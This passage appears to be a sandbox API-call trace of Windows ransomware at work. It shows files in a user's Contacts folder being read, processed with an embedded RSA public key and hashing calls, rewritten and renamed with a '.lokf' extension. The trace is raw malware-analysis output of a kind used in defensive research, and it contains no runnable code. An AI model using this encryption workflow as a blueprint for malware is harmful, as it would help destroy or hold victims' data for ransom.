RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0058.313] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.313] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0058.313] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0058.313] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0058.313] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.313] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.313] CloseHandle (hObject=0x5cc) returned 1 [0058.314] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0058.314] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0058.314] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0058.314] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.lokf")) returned 1 [0058.314] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.314] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.314] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.315] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a50 | out: hHeap=0x660000) returned 1 [0058.315] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0058.315] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3260e48 [0058.316] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.316] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260e48 | out: hHeap=0x660000) returned 1 [0058.316] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned=".contact" [0058.316] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.316] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=68382) returned 1 [0058.316] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.318] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x10af8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.318] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.320] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.320] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x10b1e, lpOverlapped=0x0) returned 1 [0058.321] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32947b0 [0058.321] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.321] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.321] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b89c8) returned 1 [0058.322] CryptCreateHash (in: hProv=0x6b89c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.322] CryptHashData (hHash=0x327ca80, pbData=0x32947b0, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.322] CryptGetHashParam (in: hHash=0x327ca80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3240c48 [0058.322] CryptGetHashParam (in: hHash=0x327ca80, dwParam=0x2, pbData=0x3240c48, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3240c48, pdwDataLen=0x9f4fa54) returned 1 [0058.322] GetLastError () returned 0x0 [0058.322] SetLastError (dwErrCode=0x0) [0058.322] GetLastError () returned 0x0 [0058.322] SetLastError (dwErrCode=0x0) [0058.322] GetLastError () returned 0x0 [0058.322] SetLastError (dwErrCode=0x0) [0058.322] GetLastError () returned 0x0 [0058.322] SetLastError (dwErrCode=0x0) [0058.322] GetLastError () returned 0x0 [0058.322] SetLastError (dwErrCode=0x0) [0058.322] GetLastError () returned 0x0 [0058.322] SetLastError (dwErrCode=0x0) [0058.322] GetLastError () returned 0x0 [0058.322] SetLastError (dwErrCode=0x0) [0058.322] GetLastError () returned 0x0 [0058.322] SetLastError (dwErrCode=0x0) [0058.322] GetLastError () returned 0x0 [0058.323] SetLastError (dwErrCode=0x0) [0058.323] GetLastError () returned 0x0 [0058.323] SetLastError (dwErrCode=0x0) [0058.323] GetLastError () returned 0x0 [0058.323] SetLastError (dwErrCode=0x0) [0058.323] GetLastError () returned 0x0 [0058.323] SetLastError (dwErrCode=0x0) [0058.323] GetLastError () returned 0x0 [0058.323] SetLastError (dwErrCode=0x0) [0058.323] GetLastError () returned 0x0 [0058.323] SetLastError (dwErrCode=0x0) [0058.323] GetLastError () returned 0x0 [0058.323] SetLastError (dwErrCode=0x0) [0058.323] GetLastError () returned 0x0 [0058.323] SetLastError (dwErrCode=0x0) [0058.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e7e8 [0058.323] GetLastError () returned 0x0 [0058.323] SetLastError (dwErrCode=0x0) [0058.323] GetLastError () returned 0x0 [0058.323] SetLastError (dwErrCode=0x0) [0058.323] GetLastError () returned 0x0 [0058.323] SetLastError (dwErrCode=0x0) [0058.323] GetLastError () returned 0x0 [0058.323] SetLastError (dwErrCode=0x0) [0058.323] GetLastError () returned 0x0 [0058.323] SetLastError (dwErrCode=0x0) [0058.323] GetLastError () returned 0x0 [0058.323] SetLastError (dwErrCode=0x0) [0058.324] GetLastError () returned 0x0 [0058.324] SetLastError (dwErrCode=0x0) [0058.324] GetLastError () returned 0x0 [0058.324] SetLastError (dwErrCode=0x0) [0058.324] GetLastError () returned 0x0 [0058.324] SetLastError (dwErrCode=0x0) [0058.324] GetLastError () returned 0x0 [0058.324] SetLastError (dwErrCode=0x0) [0058.324] GetLastError () returned 0x0 [0058.324] SetLastError (dwErrCode=0x0) [0058.324] GetLastError () returned 0x0 [0058.324] SetLastError (dwErrCode=0x0) [0058.324] GetLastError () returned 0x0 [0058.324] SetLastError (dwErrCode=0x0) [0058.324] GetLastError () returned 0x0 [0058.324] SetLastError (dwErrCode=0x0) [0058.324] GetLastError () returned 0x0 [0058.324] SetLastError (dwErrCode=0x0) [0058.324] GetLastError () returned 0x0 [0058.324] SetLastError (dwErrCode=0x0) [0058.324] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e7e8 | out: hHeap=0x660000) returned 1 [0058.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0058.324] CryptDestroyHash (hHash=0x327ca80) returned 1 [0058.324] CryptReleaseContext (hProv=0x6b89c8, dwFlags=0x0) returned 1 [0058.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.324] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.324] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.324] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257198 [0058.325] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10b20) returned 0x9c82710 [0058.325] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0058.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0058.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0058.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257198 [0058.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32947b0 [0058.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0058.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0058.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326f1c0 [0058.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216b00 [0058.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326e728 [0058.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326f2b0 [0058.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326f2c8 [0058.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0058.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0058.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x3247810 [0058.325] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x3247810, Size=0x218) returned 0x32949a8 [0058.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0058.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f2b0 | out: hHeap=0x660000) returned 1 [0058.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f2c8 | out: hHeap=0x660000) returned 1 [0058.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0058.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0058.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326f2c8 [0058.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x31cbc88 [0058.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x326f2b0 [0058.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242628 [0058.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6acc8 [0058.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x31cbce8 [0058.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0058.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e7e8 [0058.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0058.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0058.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0058.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0058.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbcc8 [0058.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f2b0 | out: hHeap=0x660000) returned 1 [0058.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbce8 | out: hHeap=0x660000) returned 1 [0058.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242628 | out: hHeap=0x660000) returned 1 [0058.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbc88 | out: hHeap=0x660000) returned 1 [0058.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f2c8 | out: hHeap=0x660000) returned 1 [0058.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e7e8 | out: hHeap=0x660000) returned 1 [0058.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0058.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32949a8 | out: hHeap=0x660000) returned 1 [0058.326] GetCurrentThreadId () returned 0x9e0 [0058.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326a688 [0058.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x6c24b0 [0058.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257390 [0058.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0058.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0058.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbc88 [0058.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbce8 [0058.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3234418 [0058.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.327] GetCurrentThreadId () returned 0x9e0 [0058.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0058.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0058.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3247810 [0058.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbc88 | out: hHeap=0x660000) returned 1 [0058.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3260e48 [0058.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbc88 [0058.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3292fe8 [0058.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbd08 [0058.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326f2c8 [0058.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbd08 | out: hHeap=0x660000) returned 1 [0058.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbd08 [0058.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0058.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0058.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0058.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0058.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326f2b0 [0058.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0058.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0058.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbd08 | out: hHeap=0x660000) returned 1 [0058.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbd08 [0058.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0058.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0058.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0058.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6acc8 [0058.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0058.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242628 [0058.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0058.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac50 [0058.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0058.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac68 [0058.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbd08 | out: hHeap=0x660000) returned 1 [0058.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x31cbd08 [0058.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0058.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac20 [0058.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbd08 | out: hHeap=0x660000) returned 1 [0058.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ace0 [0058.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ad40 [0058.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac20 | out: hHeap=0x660000) returned 1 [0058.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac20 [0058.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ace0 | out: hHeap=0x660000) returned 1 [0058.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0058.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbc88 | out: hHeap=0x660000) returned 1 [0058.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0058.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e7e8 [0058.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f2b0 | out: hHeap=0x660000) returned 1 [0058.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x326f2b0 [0058.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0058.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0058.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f2c8 | out: hHeap=0x660000) returned 1 [0058.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0058.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac20 | out: hHeap=0x660000) returned 1 [0058.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x32949a8 [0058.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e7e8 | out: hHeap=0x660000) returned 1 [0058.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3282810 [0058.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0058.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f2b0 | out: hHeap=0x660000) returned 1 [0058.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x3294bc0 [0058.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0058.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3296fa8 [0058.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbce8 | out: hHeap=0x660000) returned 1 [0058.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0058.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3247810 | out: hHeap=0x660000) returned 1 [0058.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296fa8 | out: hHeap=0x660000) returned 1 [0058.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0058.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0058.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32949a8 | out: hHeap=0x660000) returned 1 [0058.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3294bc0 | out: hHeap=0x660000) returned 1 [0058.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3282810 | out: hHeap=0x660000) returned 1 [0058.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.329] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 